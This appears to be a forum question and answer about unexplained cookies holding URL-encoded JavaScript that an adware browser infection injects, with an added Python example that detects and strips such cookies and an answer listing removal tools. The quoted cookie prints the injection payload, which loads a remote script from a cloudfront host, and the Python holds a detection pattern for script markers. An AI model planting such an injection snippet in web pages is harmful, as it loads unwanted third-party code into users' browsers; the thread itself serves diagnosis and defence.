
Some clients send requests to our webapp with additional cookies like this:

vidyk=1; svidyk=1; ykuid=tpvur0av71lvfcvbn4pz; ykoptout=false;  vidyk=1; svidyk=1; ykuid=tpvur0av71lvfcvbn4pz; ykoptout=false; _ga=GA1.2.633227847.1500039040; _gid=GA1.2.1587477355.1500039040; _gat_ga_ua2=1; _gat_ga%28'create'%2C'UA-93290101-3'%2C'auto'%2C%22ga_ua2%22%29%3Bga%28'ga_ua2.send'%2C'pageview'%29%3B!function%28%29%7Bfunction%20e%28e%2Ct%29%7Bvar%20d%3Ddocument.createElement%28%22iframe%22%29%3Bd.src%3D%22about%3Ablank%22%2Cd.style.display%3D%22none%22%2Cdocument.body.appendChild%28d%29%2CElement.prototype.appendChild%3Dd.contentWindow.Element.prototype.appendChild%2CElement.prototype.insertBefore%3Dd.contentWindow.Element.prototype.insertBefore%3Bvar%20n%3Ddocument.createElement%28%22script%22%29%3Bn.type%3D%22text%2Fjavascript%22%2Cn.async%3D!0%2Cn.src%3D%22%2F%2Fd323drta3nak2g.cloudfront.net%2Fv1%2Ftaas%3Fid%3D%22%2Be%2B%22%26api_key%3D45918e2d6de38b8deaf7927d277e58d5%26site_id%3D%22%2Bt%2B%22%26disclosure_text%3D%26disclosure_url%3Dhttps%253A%252F%252Fyieldkit.com%252Flegal-notes%252Fterms-of-service%252F%26yk_tag%3Db%22%2C%28document.getElementsByTagName%28%22head%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28n%29%7De%28%22se.prod%26pla%3D1%26si%3D1%26%22%2C%220c4d5f3a79914d97b6011efb4471a249%22%29%2Ce%28%22deals.prod%22%2C%22d7d224892cfe47c7b50aed3bb644057f%22%29%7D%28%29%3B%2F%2F=1;

Our application does not install such cookies. We use some external JavaScript, like Google Analytics, but none of those scripts does this. Our site is accessible only via HTTPS, so MITM request modification is unlikely.

We use a WAF; these requests are blocked and clients are unhappy.

I suppose some malicious browser extension is trying to exploit some popular web engine vulnerability.

Has anybody encountered anything like this? Any ideas on what is doing that?

P.S. The URL-decoded content of that cookie is JavaScript that, among other things, contains a link to http://yieldkit.com/legal-notes/terms-of-service/, but that is probably just used by the scammer to monetize their attacks.

neuro
Selivanov Pavel
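As an added example (not code from the question or the answer), the following Python splits a Cookie header into its cookies, URL-decodes each one and separates cookies whose decoded name or value looks like script from the legitimate ones, so a front end can log the event and serve the request with the junk cookie stripped instead of the WAF rejecting it wholesale. The header is a constructed, shortened sample modelled on the one quoted in the question, and the marker list is an assumption.

```python
import re
from urllib.parse import unquote

# Constructed sample modelled on the Cookie header in the question:
# ordinary cookies followed by one whose *name* is percent-encoded JavaScript.
SAMPLE_COOKIE_HEADER = (
    "ykuid=tpvur0av71lvfcvbn4pz; ykoptout=false; _ga=GA1.2.633227847.1500039040; "
    "_gat_ga%28'create'%2C'UA-93290101-3'%2C'auto'%29%3B!function%28%29%7B"
    "var%20n%3Ddocument.createElement%28%22script%22%29%3Bn.src%3D%22%2F%2F"
    "d323drta3nak2g.cloudfront.net%2Fv1%2Ftaas%22%7D%28%29%3B%2F%2F=1"
)

# Assumed markers: fragments that do not occur in legitimate cookie names but
# are typical of injected script. Matching is done after URL-decoding.
SCRIPT_MARKERS = re.compile(
    r"document\.|createElement|appendChild|\.src\s*=|!function\s*\(|</?script",
    re.IGNORECASE,
)


def parse_cookie_header(header):
    """Split a Cookie header into (raw_name, raw_value) pairs without decoding.
    Only the first '=' separates name from value; the injected text keeps its
    own '=' characters percent-encoded, so it stays inside the name."""
    pairs = []
    for part in header.split(";"):
        part = part.strip()
        if not part:
            continue
        name, sep, value = part.partition("=")
        pairs.append((name.strip(), value.strip() if sep else ""))
    return pairs


def classify_cookies(header):
    """Return (clean, suspicious). Suspicious entries carry the decoded text
    so the reviewer can see what was injected; clean entries keep raw form."""
    clean, suspicious = [], []
    for name, value in parse_cookie_header(header):
        decoded = unquote(name) + "=" + unquote(value)
        if SCRIPT_MARKERS.search(decoded) or len(name) > 256:
            suspicious.append((name, decoded))
        else:
            clean.append((name, value))
    return clean, suspicious


def sanitized_cookie_header(header):
    """Rebuild the header from the clean cookies only."""
    clean, _ = classify_cookies(header)
    return "; ".join(f"{n}={v}" for n, v in clean)
```

Logging the `suspicious` list rather than dropping the whole request gives the WAF tuning data while the client keeps working.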

1 Answer

Found it. This malware does this: http://www.spyware-ru.com/udalit-r-srvtrck-com-reklamu-instruktsiya/ (article in Russian; translated with Google Translate).

Short summary:

There is malware that creates pop-up advertising windows with the r.srvtrck.com site for Chrome, Firefox and IE. It may also inject advertising into web sites you open.

To remove it, you can use:

  • AdwCleaner program
  • Malwarebytes Anti-malware program
  • reset browser settings
  • clear the added site address that follows the browser executable in *.lnk files
  • the AdGuard program to block advertising (I would not recommend that; just clean your system and use AdBlock/uBlock)

It is also recommended to check the Windows Task Scheduler for unwanted tasks that periodically start the browser with the malware site address.

Selivanov Pavel